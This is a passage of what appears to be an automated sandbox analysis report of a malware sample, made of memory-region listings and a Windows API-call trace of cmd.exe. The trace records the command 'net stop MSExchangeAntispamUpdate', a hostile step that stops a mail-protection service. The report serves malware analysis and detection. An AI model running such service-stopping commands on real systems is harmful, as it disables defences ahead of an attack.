0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9700 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9701 start_va = 0x290000 end_va = 0x34dfff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9702 start_va = 0x350000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 9703 start_va = 0x4550000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 9704 start_va = 0x4780000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 9705 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9706 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9707 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9708 start_va = 0x7f330000 end_va = 0x7f42ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f330000" filename = "" Region: id = 9709 start_va = 0x7f458000 end_va = 0x7f45afff entry_point = 0x0 region_type = private name = "private_0x000000007f458000" filename = "" Region: id = 9710 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9711 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9712 start_va = 0x4790000 end_va = 0x4ac6fff entry_point = 0x4790000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 595 os_tid = 0xd18 [0135.209] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0135.209] __set_app_type (_Type=0x1) [0135.209] __p__fmode () returned 0x77ac4d6c [0135.209] __p__commode () returned 0x77ac5b1c [0135.209] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0135.209] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0135.209] GetCurrentThreadId () returned 0xd18 [0135.209] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd18) returned 0x84 [0135.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0135.209] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0135.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.212] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.212] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fc30 | out: phkResult=0x25fc30*=0x0) returned 0x2 [0135.212] VirtualQuery (in: lpAddress=0x25fc37, lpBuffer=0x25fbe8, dwLength=0x1c | out: lpBuffer=0x25fbe8*(BaseAddress=0x25f000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.212] VirtualQuery (in: lpAddress=0x160000, lpBuffer=0x25fbe8, dwLength=0x1c | out: lpBuffer=0x25fbe8*(BaseAddress=0x160000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.212] VirtualQuery (in: lpAddress=0x161000, lpBuffer=0x25fbe8, dwLength=0x1c | out: lpBuffer=0x25fbe8*(BaseAddress=0x161000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.212] VirtualQuery (in: lpAddress=0x163000, lpBuffer=0x25fbe8, dwLength=0x1c | out: lpBuffer=0x25fbe8*(BaseAddress=0x163000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.212] VirtualQuery (in: lpAddress=0x260000, lpBuffer=0x25fbe8, dwLength=0x1c | out: lpBuffer=0x25fbe8*(BaseAddress=0x260000, AllocationBase=0x260000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.212] GetConsoleOutputCP () returned 0x1b5 [0135.212] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.212] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0135.212] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.212] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0135.213] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.213] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0135.213] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.213] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0135.213] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.213] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0135.213] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.213] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0135.213] GetEnvironmentStringsW () returned 0x4457d80* [0135.213] FreeEnvironmentStringsA (penv="A") returned 1 [0135.213] GetEnvironmentStringsW () returned 0x4457d80* [0135.214] FreeEnvironmentStringsA (penv="A") returned 1 [0135.214] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25eb94 | out: phkResult=0x25eb94*=0x94) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x0, lpData=0x25eba0*=0xd0, lpcbData=0x25eb9c*=0x1000) returned 0x2 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x1, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x0, lpData=0x25eba0*=0x1, lpcbData=0x25eb9c*=0x1000) returned 0x2 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x0, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x40, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x40, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x0, lpData=0x25eba0*=0x40, lpcbData=0x25eb9c*=0x1000) returned 0x2 [0135.214] RegCloseKey (hKey=0x94) returned 0x0 [0135.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25eb94 | out: phkResult=0x25eb94*=0x94) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x0, lpData=0x25eba0*=0x40, lpcbData=0x25eb9c*=0x1000) returned 0x2 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x1, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x0, lpData=0x25eba0*=0x1, lpcbData=0x25eb9c*=0x1000) returned 0x2 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x0, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x9, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x4, lpData=0x25eba0*=0x9, lpcbData=0x25eb9c*=0x4) returned 0x0 [0135.214] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25eb98, lpData=0x25eba0, lpcbData=0x25eb9c*=0x1000 | out: lpType=0x25eb98*=0x0, lpData=0x25eba0*=0x9, lpcbData=0x25eb9c*=0x1000) returned 0x2 [0135.214] RegCloseKey (hKey=0x94) returned 0x0 [0135.214] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29838 [0135.214] srand (_Seed=0x5ad29838) [0135.214] GetCommandLineW () returned="/c net stop MSExchangeAntispamUpdate" [0135.214] GetCommandLineW () returned="/c net stop MSExchangeAntispamUpdate" [0135.214] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.214] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4459cd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0135.214] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0135.214] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.214] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.215] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.215] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.215] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.215] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.215] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.215] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.215] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.215] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.215] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.215] GetEnvironmentStringsW () returned 0x4457d80* [0135.215] FreeEnvironmentStringsA (penv="A") returned 1 [0135.215] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.215] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.215] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.215] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.215] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.215] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.215] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.215] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.215] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.215] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.215] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x25f96c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.215] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x25f96c, lpFilePart=0x25f964 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x25f964*="Desktop") returned 0x1d [0135.215] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0135.215] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x25f6e8 | out: lpFindFileData=0x25f6e8) returned 0x44505c8 [0135.216] FindClose (in: hFindFile=0x44505c8 | out: hFindFile=0x44505c8) returned 1 [0135.216] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x25f6e8 | out: lpFindFileData=0x25f6e8) returned 0x44505c8 [0135.216] FindClose (in: hFindFile=0x44505c8 | out: hFindFile=0x44505c8) returned 1 [0135.216] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0135.216] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x25f6e8 | out: lpFindFileData=0x25f6e8) returned 0x44505c8 [0135.216] FindClose (in: hFindFile=0x44505c8 | out: hFindFile=0x44505c8) returned 1 [0135.216] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0135.216] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0135.216] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0135.216] GetEnvironmentStringsW () returned 0x4457d80* [0135.216] FreeEnvironmentStringsA (penv="=") returned 1 [0135.216] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.217] GetConsoleOutputCP () returned 0x1b5 [0135.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.217] GetUserDefaultLCID () returned 0x409 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x25fa9c, cchData=128 | out: lpLCData="0") returned 2 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x25fa9c, cchData=128 | out: lpLCData="0") returned 2 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x25fa9c, cchData=128 | out: lpLCData="1") returned 2 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0135.217] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0135.217] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.218] GetConsoleTitleW (in: lpConsoleTitle=0x445aa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.218] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0135.218] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0135.218] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0135.218] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0135.219] _wcsicmp (_String1="net", _String2=")") returned 69 [0135.219] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0135.219] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0135.219] _wcsicmp (_String1="IF", _String2="net") returned -5 [0135.219] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0135.219] _wcsicmp (_String1="REM", _String2="net") returned 4 [0135.219] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0135.220] GetConsoleTitleW (in: lpConsoleTitle=0x25f788, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.220] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0135.220] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0135.220] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0135.220] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0135.220] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0135.220] _wcsicmp (_String1="net", _String2="CD") returned 11 [0135.220] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0135.220] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0135.220] _wcsicmp (_String1="net", _String2="REN") returned -4 [0135.220] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0135.220] _wcsicmp (_String1="net", _String2="SET") returned -5 [0135.220] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0135.220] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0135.220] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0135.220] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0135.220] _wcsicmp (_String1="net", _String2="MD") returned 1 [0135.220] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0135.220] _wcsicmp (_String1="net", _String2="RD") returned -4 [0135.220] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0135.220] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0135.220] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0135.220] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0135.220] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0135.221] _wcsicmp (_String1="net", _String2="VER") returned -8 [0135.221] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0135.221] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0135.221] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0135.221] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0135.221] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0135.221] _wcsicmp (_String1="net", _String2="START") returned -5 [0135.221] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0135.221] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0135.221] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0135.221] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0135.221] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0135.221] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0135.221] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0135.221] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0135.221] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0135.221] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0135.221] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0135.221] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0135.221] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0135.221] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="CD") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0135.221] _wcsicmp (_String1="net", _String2="REN") returned -4 [0135.221] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0135.221] _wcsicmp (_String1="net", _String2="SET") returned -5 [0135.221] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0135.221] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0135.221] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0135.221] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0135.221] _wcsicmp (_String1="net", _String2="MD") returned 1 [0135.221] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0135.221] _wcsicmp (_String1="net", _String2="RD") returned -4 [0135.221] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0135.221] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0135.221] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0135.221] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0135.221] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0135.221] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0135.221] _wcsicmp (_String1="net", _String2="VER") returned -8 [0135.221] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0135.221] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0135.221] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0135.221] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0135.221] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0135.221] _wcsicmp (_String1="net", _String2="START") returned -5 [0135.222] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0135.222] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0135.222] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0135.222] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0135.222] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0135.222] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0135.222] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0135.222] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0135.222] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0135.222] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0135.222] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0135.222] _wcsicmp (_String1="net", _String2="IF") returned 5 [0135.222] _wcsicmp (_String1="net", _String2="REM") returned -4 [0135.222] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0135.222] SetErrorMode (uMode=0x0) returned 0x0 [0135.222] SetErrorMode (uMode=0x1) returned 0x0 [0135.222] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44505d0, lpFilePart=0x25f294 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x25f294*="Desktop") returned 0x1d [0135.222] SetErrorMode (uMode=0x0) returned 0x1 [0135.222] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0135.222] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.230] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.230] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.230] GetConsoleTitleW (in: lpConsoleTitle=0x25f514, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.230] InitializeProcThreadAttributeList (in: lpAttributeList=0x25f440, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x25f424 | out: lpAttributeList=0x25f440, lpSize=0x25f424) returned 1 [0135.230] UpdateProcThreadAttribute (in: lpAttributeList=0x25f440, dwFlags=0x0, Attribute=0x60001, lpValue=0x25f42c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x25f440, lpPreviousValue=0x0) returned 1 [0135.230] GetStartupInfoW (in: lpStartupInfo=0x25f478 | out: lpStartupInfo=0x25f478*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.230] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.230] 